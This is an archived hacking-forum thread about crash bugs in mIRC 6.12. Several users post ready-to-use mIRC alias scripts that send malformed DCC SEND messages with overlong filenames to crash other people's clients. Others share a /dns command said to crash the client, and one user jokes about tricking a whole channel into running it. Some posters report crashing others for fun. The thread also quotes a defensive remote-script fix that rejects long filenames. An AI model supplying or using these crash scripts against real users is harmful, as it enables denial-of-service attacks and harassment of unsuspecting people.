hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: New Mirc Bug
icedealer
mmh hey
my friend told me his mirc crash all the time

anyone got an idea why?

it's mIRC 6.12
some other ppl told me the same mirc shit
Serhat
Just let your friend remove all the script, maybe some buggy script is Bugging him...
geex0r
there is an exploit for 6.12

CODE


alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }



but you have to accept it first before the exploit works

so let your friend turn off auto accept

Mamoose
nuratasya writes "Breaking News. On Oct 20, another exploit was identified which can crash even the recently released version 6.12. It only seems to affect people who minimize DCC get dialog windows (manually or by default), and then open those windows to get a file with an excessively long filename. You can't be crashed unless that sequence of events occurs. That manual step is required. If you auto-get the file, or don't get the file at all, nothing happens.

If and only if you think the above affects you, then here is a temporary fix which should be pasted in your "remotes" section (alt-r to access). It basically rejects any excessively long filename.

ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt } or this shorter version without the warning message: ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) halt

If you are not comfortable with modifying your remotes, you can just ignore all incoming DCC sends with the following, which is the same temporary fix as for the other bug described in the next section: /ignore -wd *

You can undo the above command by /ignore -rwd * (note the r for remove)."
Posted on Friday, October 24 @ 22:45:32 HKT by miniPC

From this site
PC Techforums
spidey
so i put that code in my alias and send a file to someone and wait for them to accept it???? huh.gif The old exploit i had
[CODE]/exploit { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
`
nmcog
/dns 194.65.143.148
crashes everytime all the time
Sisifos
QUOTE (nmcog @ Feb 11 2004, 12:34 AM)
/dns 194.65.143.148
crashes everytime all the time

?????
Say What ?!?!?
Have you actually done that DNS and your client crashed ?
hdlgp
:? crashed ????
nmcog
Execute the command inside mIRC:
/dns 194.65.143.148

and not nslookup.exe or whatever
Sisifos
QUOTE (nmcog @ Feb 11 2004, 01:28 PM)
You fools. Execute the command in mIRC:
/dns 194.65.143.148

This is a joke right???
You got to be kidding...
Well, being a "fool" i have already tried the specific dns you requested, from your last post, both on WinXpSP1 and Win2k3.
And guess what, nothing happened!!!!
Could you please enlighten us as to what was suppoced to happen and why?
nmcog
Run mIRC 6.12
execute the command inside mIRC: /dns 194.65.143.148
mirc.exe crashes (ws2_32.dll)

tested on WinXP (SP0) and WinXP (SP1)
chris105
He is right that exploit does work, i remmber reading it has something to do with something on a certain range being NULL google it and im sure you will find the details
nubela
doesn work for both "exploit". tried and tested.
ilnctm
oh no not another irc bug :/
tolf
yep crashed my Mirc
nubela
which xploit crashed u mirc?
chris105
You have to be using windows xp (i run sp1 and it works) and mirc 6.12 or it WONT work !!
Sisifos
QUOTE (nmcog @ Feb 11 2004, 10:54 PM)
Run mIRC 6.12
execute the command inside mIRC: /dns 194.65.143.148
mirc.exe crashes (ws2_32.dll)

tested on WinXP (SP0) and WinXP (SP1)

Not everyone uses 6.12 tongue.gif
zero-maitimax
i still use it... biggrin.gif

strange lot of ppl traid it but still it didn't crash my mirc ahahah biggrin.gif
nmcog
What do you use then?
Because mIRC pre-6.12 has a security bug
WaZaa
it crashed my mirc to ...

and my windows xp is upgraded fully :| ... I GUESS biggrin.gif

damn buggiez tongue.gif

greetz .. WaZaa ..
Mouse
I do have crash problem too, but I think its my script
roto
didnt crash me, win2ksp4
roto
crashed my XP box i guess tho:)
pdf
QUOTE (geex0r @ Feb 2 2004, 05:50 PM)
there is an exploit for 6.12

CODE


alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }



but you have to accept it first before the exploit works

so let your friend turn off auto accept

it's not working in windows xp
Sisifos
QUOTE (nmcog @ Feb 16 2004, 05:45 PM)
What do you use then?
Because mIRC pre-6.12 has a security bug

Most if not all of the versions have some bugs...
The one i use is 5.*
nmcog
because the domain of that ip is longer than 129 bytes (i think tahts the number) and overflows, its an xp problem not a mirc problem
IcedOut3E
crashes my shit

kind of funny.
Diawollo
interesting huh.gif
flashb4ck
guys i know this one its older but still works on the most users which use scripts like noname,devils and so on ...


CODE
/crash { raw PRIVMSG $$1 :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }



perhabs someone know this method i really often (filtered) uf with this one ;D

greetz fl4Shb4Ck
slickplaid
I tried both exploits on my WinXP SP1 machine and it crashed it both times. The long filename exploit required me to click on the download first. Fun stuff. smile.gif
DvilleStoner
it didnt crash my win2k sp4 box
NiteWorM
that /dns bug crashes some pc's but not all because some pc's cant see the zone coz of some network crap so i am told, ive got several people to try it, it crashed for me( i am in au) and it didnt for my mate( who is in ro) so go figure
linuxwolf
Heh.... I just think that a moderator should put a tutorial up about buffer overflows? and stack overflows? Maybe people then would understand just WHAT xp is doing, heh.. i for one know the danger of overflows, i mean, root is commonly compromised on local systems, thanks to overflows in programs not having limits.
Any chance of that? gsecure? ph34r.gif
Richie
Recently on an irc server that I frequent, all the netadmins left with only the message "Client exited", and immediately afterwards, a small botnet joined (6 clients). Anyone have any info on how they could've killed all the admins?

The server is running unrealircd, if that's any help.
LoRdi2k4
Haha thats so funny
/amsg /dns 194.65.143.148 ;D
private
Put this in your aliases in mirc:


/crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) }


/crash (nickname)


works fine

LKM
this also crashed my v6.14 mirc, winxp sp1 fr
wizy
Does anyone actually know WHY that crashes? I mean, we all know its an overflow. But why is RIPE sending that back?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.